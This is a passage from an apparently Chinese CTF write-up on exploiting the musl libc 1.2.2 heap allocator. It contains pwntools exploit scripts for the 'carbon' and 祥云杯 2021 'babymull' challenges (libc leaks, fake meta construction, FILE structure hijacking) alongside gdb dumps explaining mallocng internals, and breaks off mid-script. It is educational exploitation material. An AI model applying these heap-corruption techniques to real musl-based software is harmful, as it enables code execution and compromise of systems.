class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'119.3.81.43'</span>, <span class="number">49153</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process([<span class="string">"./libc.so"</span>,<span class="string">"./carbon"</span>])</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">menu</span>(<span class="params">choice</span>):</span></span><br><span class="line"> sla(<span class="string">"> "</span>,<span class="built_in">str</span>(choice))</span><br><span class="line"><span class="function"><span 
class="keyword">def</span> <span class="title">add</span>(<span class="params">size,believer,content</span>):</span></span><br><span class="line"> menu(<span class="number">1</span>)</span><br><span class="line"> sla(<span class="string">'size? >'</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> sla(<span class="string">'believer? >'</span>,<span class="built_in">str</span>(believer)) <span class="comment">#Y</span></span><br><span class="line"> sa(<span class="string">'sleeve >'</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">idx,content</span>):</span></span><br><span class="line"> menu(<span class="number">3</span>)</span><br><span class="line"> sla(<span class="string">"sleeve ID? >"</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"> sl(content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">idx</span>):</span></span><br><span class="line"> menu(<span class="number">4</span>)</span><br><span class="line"> sla(<span class="string">"sleeve ID? >"</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params">idx</span>):</span></span><br><span class="line"> menu(<span class="number">2</span>)</span><br><span class="line"> sla(<span class="string">"sleeve ID? 
>"</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">death</span>():</span></span><br><span class="line"> menu(<span class="number">5</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># ========================================================leak libc</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'N'</span>,<span class="string">'a'</span>*<span class="number">0x30</span>) <span class="comment">#0</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'N'</span>,<span class="string">'a'</span>*<span class="number">0x30</span>) <span class="comment">#1 avoid consolidation</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'N'</span>,<span class="string">'b'</span>*<span class="number">0x30</span>) <span class="comment">#3</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'N'</span>,<span class="string">'c'</span>*<span class="number">0x30</span>) <span class="comment">#4</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'N'</span>,<span class="string">'a'</span>*<span class="number">0x30</span>) <span class="comment">#5 avoid consolidation</span></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">8</span>,<span class="string">'N'</span>,<span class="string">'b'</span>*<span class="number">8</span>) <span class="comment">#0</span></span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">mal = u64(sh.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) - <span class="number">24</span></span><br><span 
class="line">leak(<span class="string">'mal'</span>,mal)</span><br><span class="line">libc = ELF(<span class="string">'./libc.so'</span>)</span><br><span class="line">libc.address = mal - <span class="number">0x292ac0</span></span><br><span class="line">leak(<span class="string">'libc.address'</span>,libc.address)</span><br><span class="line"></span><br><span class="line"><span class="comment"># =========================================================hijack bin</span></span><br><span class="line">delete(<span class="number">4</span>)</span><br><span class="line"><span class="comment"># overflow chunk4(in bin)</span></span><br><span class="line">delete(<span class="number">3</span>)</span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'Y'</span>,<span class="string">'d'</span>*<span class="number">0x30</span>+p64(<span class="number">0x41</span>)+p64(<span class="number">0xb40</span>)+p64(mal+<span class="number">880</span>)+p64(libc.sym[<span class="string">'__stdin_FILE'</span>]+<span class="number">0x40</span>)+<span class="string">'\n'</span>) <span class="comment">#3</span></span><br><span class="line"><span class="comment"># insert bin</span></span><br><span class="line">add(<span class="number">0x30</span>,<span class="string">'N'</span>,<span class="string">'e'</span>*<span class="number">0x30</span>) <span class="comment">#4</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x80</span>,<span class="string">'N'</span>,<span class="string">'g'</span>*<span class="number">0x30</span>) <span class="comment">#5 write stdin!</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(sh)</span></span><br><span class="line">ti()</span><br></pre></td></tr></table></figure><hr><h1 id="Version-1-2-2"><a href="#Version-1-2-2" class="headerlink" title="Version 1.2.2"></a>Version 1.2.2</h1><h2 id="祥云杯-2021-babymull"><a href="#祥云杯-2021-babymull" 
class="headerlink" title="祥云杯_2021_babymull"></a><strong>祥云杯_2021_babymull</strong></h2><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">$</span><span class="bash">./libc.so</span> </span><br><span class="line">musl libc (x86_64)</span><br><span class="line">Version 1.2.2</span><br><span class="line">Dynamic Program Loader</span><br></pre></td></tr></table></figure><p><a href="http://pzhxbz.cn/?p=172">A brief analysis of the new musl libc</a></p><p><a href="https://blog.csdn.net/easy_level1/article/details/118606424">[Reading material] Source-level analysis of heap management in the new musl libc (1.2.2)!</a></p><p><a href="https://www.anquanke.com/post/id/241101#h2-5">Learning musl mallocng through mooosl from DefCon Quals 2021 (source audit part)</a></p><p>The exploit for this challenge follows the <a href="https://mp.weixin.qq.com/s/UwrZVlQ_WJ5rO4InOErt1g">Official Writeup of the 2nd “祥云杯” Cybersecurity Competition, Pwn section</a> </p><h3 id="静态分析-1"><a href="#静态分析-1" class="headerlink" title="Static analysis"></a><strong>Static analysis</strong></h3><p>execve is disabled.</p><p>Chunks can only be written in add.</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">manage_chunk</span>{</span> <span class="comment">// 0x20</span></span><br><span class="line"><span class="keyword">char</span> name[<span class="number">0x10</span>];</span><br><span class="line"><span class="keyword">void</span> *chunk_ptr; <span class="comment">// chunk_Size <= 0x1000</span></span><br><span class="line"><span class="keyword">size_t</span> size;</span><br><span class="line">};</span><br></pre></td></tr></table></figure><p>The chunk_ptr pointer is not zeroed after free.</p><p>There is one chance to show.</p><p>One-shot backdoor: zero a single byte at an arbitrary address, then leak 8 bytes from an arbitrary address.</p><p><img 
src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912182016284.png" alt="image-20210912182016284"></p><h3 id="gdb查看数据结构"><a href="#gdb查看数据结构" class="headerlink" title="Inspecting the data structures in gdb"></a><strong>Inspecting the data structures in gdb</strong></h3><p>Walk through the structures one by one from the top, following the figure below.</p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/t015d8a64ff8626cf0d.png" alt="img"></p><h4 id="malloc-context"><a href="#malloc-context" class="headerlink" title="__malloc_context"></a><strong>__malloc_context</strong></h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">pwndbg> p __malloc_context</span><br><span class="line"><span class="variable">$1</span> = {</span><br><span class="line"> secret = <span class="number">13395722478044406582</span>, </span><br><span class="line"> init_done = <span class="number">1</span>, </span><br><span class="line"> mmap_counter = <span class="number">0</span>, </span><br><span class="line"> free_meta_head = <span class="number">0</span>x0, 
</span><br><span class="line"> avail_meta = <span class="number">0</span>x5555560cc1f8, <span class="comment"># address of the first free meta managed in meta_area; avail_meta_count gives how many there are</span></span><br><span class="line"> avail_meta_count = <span class="number">89</span>, </span><br><span class="line"> avail_meta_area_count = <span class="number">0</span>, </span><br><span class="line"> meta_alloc_shift = <span class="number">0</span>, </span><br><span class="line"> meta_area_head = <span class="number">0</span>x5555560cc000, </span><br><span class="line"> meta_area_tail = <span class="number">0</span>x5555560cc000, </span><br><span class="line"> avail_meta_areas = <span class="number">0</span>x5555560cd000 <error: Cannot access memory at address <span class="number">0</span>x5555560cd000>, </span><br><span class="line"> active = {<span class="number">0</span>x0 <repeats <span class="number">11</span> times>, <span class="number">0</span>x5555560cc090, <span class="number">0</span>x0, <span class="number">0</span>x0, <span class="number">0</span>x0, <span class="number">0</span>x5555560cc068, <span class="number">0</span>x0, <span class="number">0</span>x0, <span class="number">0</span>x0, <span class="number">0</span>x5555560cc040, <span class="number">0</span>x0, <span class="number">0</span>x0, <span class="number">0</span>x0, <span class="number">0</span>x5555560cc018, <span class="number">0</span>x0 <repeats <span class="number">24</span> times>}, </span><br><span class="line"> <span class="comment"># the allocator divides chunks into 48 size classes by requested size; active caches the metas that can still be allocated from, indexed by size class</span></span><br><span class="line"> usage_by_class = {<span class="number">0</span> <repeats <span class="number">48</span> times>}, <span class="comment"># number of chunks managed by the groups of all cached metas of the corresponding size class</span></span><br><span class="line"> unmap_seq = <span class="string">'\000'</span> <repeats <span class="number">31</span> times>, </span><br><span class="line"> bounces = <span class="string">'\000'</span> <repeats <span class="number">31</span> 
times>, </span><br><span class="line"> seq = <span class="number">0</span> <span class="string">'\000'</span>, </span><br><span class="line"> brk = <span class="number">93825004261376</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">pwndbg> p &__malloc_context</span><br><span class="line"><span class="variable">$2</span> = (struct malloc_context *) <span class="number">0</span>x7f952e19cb60 <__malloc_context></span><br><span class="line"></span><br><span class="line">pwndbg> vmmap</span><br><span class="line">LEGEND: STACK | HEAP | CODE | <span class="keyword">DATA</span> | RWX | RODATA</span><br><span class="line">......</span><br><span class="line"> <span class="number">0</span>x7f952e19c000 <span class="number">0</span>x7f952e19d000 rw<span class="literal">-p</span> <span class="number">1000</span> <span class="number">98000</span> /home/wendy/Desktop/xyb/babymull/libc.so</span><br><span class="line">......</span><br><span class="line"></span><br></pre></td></tr></table></figure><p><code>__malloc_context</code> is musl libc's global management structure, the counterpart of main_arena; it lives in the bss segment of libc.so.</p><p><code>active = {0x0 <repeats 11 times>, 0x5555560cc090,0...</code>: the allocator divides chunks into 48 classes according to the requested size, designated by sizeclass. Each class is managed by a meta structure; the number of chunks one meta can manage is limited and given by <code>small_cnt_tab</code>. When the number of requests exceeds what one meta can manage, the allocator allocates another meta of the same class to manage more chunks, and metas of the same class are kept in a doubly-linked list.<br><code>usage_by_class = {0 <repeats 48 times>}</code>: the number of chunks currently managed by each meta.</p><h4 id="申请-chunk后的malloc-context变化"><a href="#申请-chunk后的malloc-context变化" class="headerlink" title="Changes to malloc_context after allocating chunks"></a><strong>Changes to malloc_context after allocating chunks</strong></h4><p>Testing directly with this challenge: add 0x20 twice, which amounts to allocating four 0x30 chunks.</p><p>Only after the user requests space is a meta page created to manage chunks.</p><p>At the same time the corresponding element of malloc_context's active array points to the meta address.</p><p>The usage_by_class array shows the maximum number of chunks each group of that meta can manage.</p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/%E6%97%A0%E6%A0%87%E9%A2%98.png" alt="无标题"></p><h4 id="meta结构体"><a href="#meta结构体" class="headerlink" 
title="The meta structure"></a><strong>The meta structure</strong></h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">meta</span> {</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">meta</span> *<span class="title">prev</span>, *<span class="title">next</span>;</span> <span class="comment">// metas form a doubly-linked list</span></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">group</span> *<span class="title">mem</span>;</span></span><br><span class="line"> <span class="keyword">volatile</span> <span class="keyword">int</span> avail_mask, freed_mask;</span><br><span class="line"> <span class="keyword">uintptr_t</span> last_idx:<span class="number">5</span>;</span><br><span class="line"> <span class="keyword">uintptr_t</span> freeable:<span class="number">1</span>;</span><br><span class="line"> <span class="keyword">uintptr_t</span> sizeclass:<span class="number">6</span>;</span><br><span class="line"> <span class="keyword">uintptr_t</span> maplen:<span class="number">8</span>*<span class="keyword">sizeof</span>(<span class="keyword">uintptr_t</span>)<span class="number">-12</span>;</span><br><span class="line">};</span><br></pre></td></tr></table></figure><p>Inspecting the meta structure in gdb after allocating 4 chunks</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x20</span>, <span class="string">b"B"</span>*<span 
class="number">0x20</span>)</span><br><span class="line">add(<span class="number">0x20</span>, <span class="string">b"C"</span>*<span class="number">0x20</span>)</span><br></pre></td></tr></table></figure><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912153822227.png" alt="image-20210912153822227"></p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912154050548.png" alt="image-20210912154050548"></p><blockquote><p><code>0x7fb8fbfa9ce0</code> is the <code>user data</code> area;<br><code>avail_mask = 1008 = 0b11 1111 0000</code> means chunks 0, 1, 2 and 3 are unavailable (already in use);<br><code>freed_mask = 0</code> means no chunk has been freed;<br><code>last_idx = 9</code> means the last chunk has index 9, so there are 10 in total;<br><code>sizeclass = 2</code> means it is managed by group <code>2</code>.</p></blockquote><p>Once all 10 chunks in group 2 have been used, a further allocation opens a second meta page for management, and the two metas are maintained in a doubly-linked list.</p><h4 id="group里的chunk结构"><a href="#group里的chunk结构" class="headerlink" title="Chunk structure inside a group"></a><strong>Chunk structure inside a group</strong></h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">chunk</span> {</span></span><br><span class="line"> <span class="keyword">uint8_t</span> zero;</span><br><span class="line"> <span class="keyword">uint8_t</span> idx; <span class="comment">// low 5 bits are idx, high 3 bits are reserved</span></span><br><span class="line"> <span class="keyword">uint16_t</span> offset;</span><br><span class="line"> <span class="keyword">char</span> usermem[]; <span class="comment">// <-- memory handed to the user</span></span><br><span class="line">};</span><br></pre></td></tr></table></figure><p>Follow the mem pointer in the meta structure shown above to view the <code>user data</code> area</p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912160425927.png" alt="image-20210912160425927"></p><p>Note that the smallest chunk size handed to the user is 0x8.</p><p>As in glibc, <strong>reuse</strong> is possible: it can accept <code>8+4</code> bytes of input, <strong>occupying the first 4 bytes of the next chunk header</strong>.</p><h4 id="释放-chunk之后meta结构变化"><a 
href="#释放-chunk之后meta结构变化" class="headerlink" title="Changes to the meta structure after freeing a chunk"></a><strong>Changes to the meta structure after freeing a chunk</strong></h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">add(<span class="number">0x20</span>, b<span class="string">"B"</span>*<span class="number">0x20</span>)</span><br><span class="line">add(<span class="number">0x20</span>, b<span class="string">"C"</span>*<span class="number">0x20</span>)</span><br><span class="line"><span class="keyword">delete</span>(<span class="number">0</span>)</span><br></pre></td></tr></table></figure><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">pwndbg> p *(struct meta*)<span class="number">0</span>x55555688b1f8</span><br><span class="line"><span class="variable">$2</span> = {</span><br><span class="line"> prev = <span class="number">0</span>x55555688b1f8, </span><br><span class="line"> next = <span class="number">0</span>x55555688b1f8, </span><br><span class="line"> mem = <span class="number">0</span>x7f9d4c0fbce0, </span><br><span class="line"> avail_mask = <span class="number">1008</span>, </span><br><span class="line"> freed_mask = <span class="number">3</span>, </span><br><span class="line"> last_idx = <span class="number">9</span>, </span><br><span class="line"> freeable = <span class="number">1</span>, </span><br><span class="line"> sizeclass = <span class="number">2</span>, </span><br><span class="line"> maplen = <span 
class="number">0</span></span><br><span class="line">}</span><br></pre></td></tr></table></figure><p><code>freed_mask = 3 = 0b11</code> means the first two chunks have been freed;<br><code>avail_mask = 1008 = 0b11 1111 0000</code> shows that avail_mask has not changed, so the first two chunks are still in the non-allocatable state.</p><p>chunk header</p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912163514516.png" alt="image-20210912163514516"></p><p>With the above more or less understood, the exp should now be readable.</p><p>Reproduction</p><h3 id="how-to-leak-1"><a href="#how-to-leak-1" class="headerlink" title="how to leak"></a><strong>how to leak</strong></h3><p>The manage chunk itself holds the slot pointer (a slot is really just a chunk, but musl seems to call it a slot), but the name in front of it contains a terminator, so it cannot be leaked.</p><p>A freed chunk is only reused once every chunk in the group has been used.</p><p>So we first allocate all 10 chunks and fill them with data, then free the chunks in the first two boxes of the figure above,</p><p>then allocate two content_chunks whose size is not 0x20; the manage_chunk of the second content_chunk is then the chunk in the second box of the figure above,</p><p>and the name terminator is gone, so the show function can leak the pointer field that follows directly.</p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912170553923.png" alt="image-20210912170553923"></p><h3 id="how-to-hijack-1"><a href="#how-to-hijack-1" class="headerlink" title="how to hijack"></a><strong>how to hijack</strong></h3><p>When content_chunk5 is deleted,</p><p>the offset in content_chunk5's header is used to locate the address where the meta address is stored.</p><p>We changed that offset to 0x1000 with the backdoor function,</p><p>so it resolves to the fake meta address already written inside chunk0,</p><p>and the fake meta is thus linked into active.</p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912223251244.png" alt="image-20210912223251244"></p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912223348499.png" alt="image-20210912223348499"></p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210912223734296.png" alt="image-20210912223734296"></p><p>Then edit chunk0 again.</p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210913101355722.png" alt="image-20210913101355722"></p><p><img src="/2021/09/05/musl_pwn_%E5%88%9D%E6%8E%A2/image-20210913103019896.png" alt="image-20210913103019896"></p><p>This new region is just right for writing the orw rop.</p><p>After that, allocating a 0x800 chunk lands exactly on stdout_FILE.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span 
class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span 
class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: UTF-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.arch=<span class="string">'amd64'</span></span><br><span class="line"></span><br><span class="line">flag=<span class="number">0</span></span><br><span class="line"><span class="keyword">if</span> flag:</span><br><span class="line"> sh = remote(<span class="string">'119.3.81.43'</span>, <span class="number">49153</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line"> sh = process([<span class="string">"./libc.so"</span>,<span class="string">"./babymull"</span>])</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = 
<span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">":"</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">menu</span>(<span class="params">choice</span>):</span></span><br><span class="line"> sla(<span class="string">"choice >> "</span>,<span class="built_in">str</span>(choice))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">Size,content=<span class="string">'A'</span>, name=<span class="string">b"A"</span>*<span class="number">0xf</span></span>):</span></span><br><span class="line"> menu(<span class="number">1</span>)</span><br><span class="line"> sa(<span class="string">'Name: '</span>,name)</span><br><span class="line"> sla(<span class="string">'Size: '</span>,<span class="built_in">str</span>(Size))</span><br><span class="line"> sla(<span class="string">'Content: '</span>,content)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">idx</span>):</span></span><br><span class="line"> menu(<span class="number">3</span>)</span><br><span class="line"> sla(<span class="string">"Index: "</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">delete</span>(<span class="params">idx</span>):</span></span><br><span class="line"> menu(<span class="number">2</span>)</span><br><span class="line"> sla(<span class="string">"Index: "</span>,<span class="built_in">str</span>(idx))</span><br><span class="line"><span 
class="function"><span class="keyword">def</span> <span class="title">gift</span>(<span class="params">set_zero,leak_addr</span>):</span></span><br><span class="line"> menu(<span class="number">0x73317331</span>)</span><br><span class="line"> sl(<span class="built_in">str</span>(set_zero))</span><br><span class="line"> sl(<span class="built_in">str</span>(leak_addr))</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line"> add(<span class="number">0x20</span>, <span class="string">b"B"</span>*<span class="number">0x20</span>) <span class="comment"># fill group2</span></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x1000</span>) <span class="comment"># 0 use manage_chunk0</span></span><br><span class="line">add(<span class="number">0x1000</span>, <span class="string">'\x00'</span>*<span class="number">0x238</span> + p32(<span class="number">0x5</span>)) <span class="comment"># 5 use content_chunk0 why p32(0x5)????</span></span><br><span class="line"><span class="comment"># # fake reserved_size</span></span><br><span class="line"></span><br><span class="line"><span class="comment">### Leak libc address</span></span><br><span class="line">show(<span class="number">5</span>)</span><br><span class="line">libc=ELF(<span class="string">'./libc.so'</span>,checksec=<span class="literal">False</span>)</span><br><span class="line">libc.address = u64(sh.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) + <span class="number">0x2aa0</span> +<span class="number">0x6000</span></span><br><span class="line">leak(<span class="string">'libc.address'</span>,libc.address)</span><br><span class="line">mmap_base = 
libc.address - <span class="number">0xa000</span> </span><br><span class="line">leak(<span class="string">'mmap_base'</span>,mmap_base)</span><br><span class="line">leak(<span class="string">'mmap_base + 0x1560 -8 + 6'</span>,mmap_base + <span class="number">0x1560</span> -<span class="number">8</span> + <span class="number">6</span>)</span><br><span class="line">leak(<span class="string">'malloc_context'</span>,libc.symbols[<span class="string">'__malloc_context'</span>])</span><br><span class="line"></span><br><span class="line"><span class="comment"># modify head of content_chunk_5 // offset 0x1550->0x1000</span></span><br><span class="line"><span class="comment"># leak __malloc_context->secrect</span></span><br><span class="line">gift(mmap_base + <span class="number">0x1560</span> -<span class="number">8</span> + <span class="number">6</span> ,libc.symbols[<span class="string">'__malloc_context'</span>])</span><br><span class="line">sh.recvuntil(<span class="string">'0x'</span>)</span><br><span class="line">secret = <span class="built_in">int</span>(sh.recvuntil(<span class="string">'\n'</span>,drop=<span class="literal">True</span>),<span class="number">16</span>)</span><br><span class="line">leak(<span class="string">'secret'</span>,secret)</span><br><span class="line"></span><br><span class="line"><span class="comment"># ======================================================================================</span></span><br><span class="line"></span><br><span class="line"><span class="comment">### Construct fake_meta and fake_meta_arena</span></span><br><span class="line">fake_meta = mmap_base+<span class="number">0x1000</span>+<span class="number">8</span></span><br><span class="line">fake_meta_ptr = mmap_base+<span class="number">0x550</span></span><br><span class="line"><span class="comment"># fake_meta_ptr</span></span><br><span class="line">pp = flat({<span class="number">0x550</span>-<span class="number">0x30</span>: fake_meta}, filler=<span 
